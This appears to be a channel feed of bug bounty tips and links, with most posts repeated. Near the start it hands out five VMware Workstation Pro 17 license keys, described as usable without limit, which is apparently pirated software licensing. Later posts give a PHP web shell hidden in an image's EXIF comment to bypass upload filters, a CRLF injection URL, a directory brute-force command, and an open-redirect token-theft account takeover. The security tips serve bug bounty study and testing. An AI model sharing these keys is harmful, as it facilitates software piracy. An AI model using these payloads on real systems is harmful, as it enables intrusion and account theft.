Which Software You Use for Virtual Machine ?
Anonymous Poll
56%
Vmware
37%
Oracle's Virtual Box
3%
Hyper-v
5%
Other
👍2👏1
I love ❤️ you all of you so much
Here are the license key for VMware workstation Pro 17 :
1. MC60H-DWHD5-H80U9-6V85M-8280D
2.
4A4RR-813DK-M81A9-4U35H-06KND
3.
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4.
4C21U-2KK9Q-M8130-4V2QH-CF810
5.
4Y09U-AJK97-089Z0-A3054-83KLA
No limit to avail, these license key can you use multiple times
Here are the license key for VMware workstation Pro 17 :
1. MC60H-DWHD5-H80U9-6V85M-8280D
2.
4A4RR-813DK-M81A9-4U35H-06KND
3.
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4.
4C21U-2KK9Q-M8130-4V2QH-CF810
5.
4Y09U-AJK97-089Z0-A3054-83KLA
No limit to avail, these license key can you use multiple times
❤57👍17🥰4👏4🎉4👌2
Bug Bounty Reports in Thread 🧵
Bug : GitHub For Bypassing Filtration
oF HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
Bug : GitHub For Bypassing Filtration
oF HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
👍5❤2🔥2🤩1
Check For CRLF injection in it 🎉
When webapp redirects you from http to https
For eX: http://example.com/%0d%0aTest:%20Test
and simultaneously check your developer's network tab with 301 and 302, Check the header 😃
#bugbounty #infosec
When webapp redirects you from http to https
For eX: http://example.com/%0d%0aTest:%20Test
and simultaneously check your developer's network tab with 301 and 302, Check the header 😃
#bugbounty #infosec
🤩6❤3👍3🥰1
All Security Assessment Wordlists 📃 : 👇
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
🔥8👍6
General Discussion On :
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
YouTube
BUG BOUNTY - IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA ||ZERO DAY EP 02
Cyberhawk Security session with guest HARSH BOTHRA and host NJAY.
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👍9👎1🤩1
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
👍15😍5
Bug Bounty Tip 😃
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:
dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:
dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
👍23⚡4👏3🥰1🌚1
Parin's Burpsuite course for 0$, yeah totally #free.
https://www.udemy.com/course/bug-bounty-hunting-with-burp-suite/?couponCode=WHITEFRIDAYHERE
Coupons are limited. Be fast
Share to all.
#bugbounty #infosec
https://www.udemy.com/course/bug-bounty-hunting-with-burp-suite/?couponCode=WHITEFRIDAYHERE
Coupons are limited. Be fast
Share to all.
#bugbounty #infosec
🔥8😢6🥰5👍3❤1🤨1
🔍 8 Best Recon Technique For Active Subdomain Enumeration
link : https://bugbountyguide.org/index.php/2022/11/26/8-best-recon-technique-for-active-subdomain-enumeration/
#bugbounty #infosec #cybersecurity
link : https://bugbountyguide.org/index.php/2022/11/26/8-best-recon-technique-for-active-subdomain-enumeration/
#bugbounty #infosec #cybersecurity
👍8🔥4👌1
Guys 👆! Which logo Looks Good For Our New Website bugbountyguide.org. I'll put whatever you choose ( high percentage will consider )👇
Anonymous Poll
17%
1
27%
2
55%
3
👍9🥰2❤1
Bug Bounty Reports in Thread 🧵
#bugbounty #Infosec
Bug : OAuth 2.0
Open Redirect Leak of authenticity_token lead to full account take over.
Organisation : Twitter
Bounty : $1400
==Start==
Impact URL:
https://mobile.twitter. com/messages/follow?recipient=/example.com
•when He click Follow
•And this cause redirect his POST request to https://example.com which contains his authenticity_token
Impact : Can be used for anything like tweeting, following, sending messages, changing username.,.,.etc
it can be used too to Add a mobile number, and then steal the account by recovering it by the mobile number.
Thanks For Reading This Amazing Bug Bounty Reports in thread 🧵 On OAuth 2.0
Hope you like it 👍
#bugbounty #Infosec
Bug : OAuth 2.0
Open Redirect Leak of authenticity_token lead to full account take over.
Organisation : Twitter
Bounty : $1400
==Start==
Impact URL:
https://mobile.twitter. com/messages/follow?recipient=/example.com
•when He click Follow
•And this cause redirect his POST request to https://example.com which contains his authenticity_token
Impact : Can be used for anything like tweeting, following, sending messages, changing username.,.,.etc
it can be used too to Add a mobile number, and then steal the account by recovering it by the mobile number.
Thanks For Reading This Amazing Bug Bounty Reports in thread 🧵 On OAuth 2.0
Hope you like it 👍
🔥13❤4👍2